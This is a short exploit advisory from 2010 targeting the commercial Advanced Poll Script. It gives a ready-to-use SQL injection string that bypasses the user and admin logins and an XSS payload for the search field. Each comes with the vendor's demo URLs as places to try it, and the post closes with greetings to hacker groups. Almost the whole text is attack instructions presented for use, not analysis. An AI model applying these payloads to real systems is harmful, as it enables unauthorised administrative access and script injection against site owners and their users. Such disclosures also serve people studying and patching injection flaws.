Advanced Poll Script SQL Injection / Cross Site Scripting

`# Exploit Title: XSS and Authentication bypass in Advanced Poll Script  
# Date: 26-apr-2010  
# Author: Sid3^effects  
# Software Link: N/a  
# CVE : []  
# Code : [] ______________________________________________________________________________  
XSS and Authentication bypass in Advanced Poll Script  
Vendor:http://www.2daybiz.com/  
___________________________Author:Sid3^effects_________________________________  
  
  
Description :  
  
Advanced Poll is a polling system with powerful administration tool supports both text file and MySQL database. Its features include multiple polls, unlimited options, IP-Logging, IP-Locking, cookie support, comment feature, vote expire feature, and random poll support.   
  
script cost :$140  
---------------------------------------------------------------------------  
* Authentication bypass:  
  
The following script has authentication bypass in the admin login as well as in user login   
  
use ' or 1=1 or ''=' in both login and password.  
  
user login demo :http://www.2daybiz.com/products/polls/login.php  
admin login demo: http://www.2daybiz.com/products/polls/admin/  
---------------------------------------------------------------------------  
* XSS (cross site scripting ) :  
  
XSS is also found in the search field.   
  
  
Attack Pattern: '"--><script>alert(0x000872)</script>   
  
DEMO:http://www.2daybiz.com/products/polls/index_search.php?category= [XSS]  
---------------------------------------------------------------------------  
  
ShoutZ :  
-------   
---Indian Cyber warriors--Andhra hackers--   
  
Greetz :  
--------  
---*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--MayUr--  
`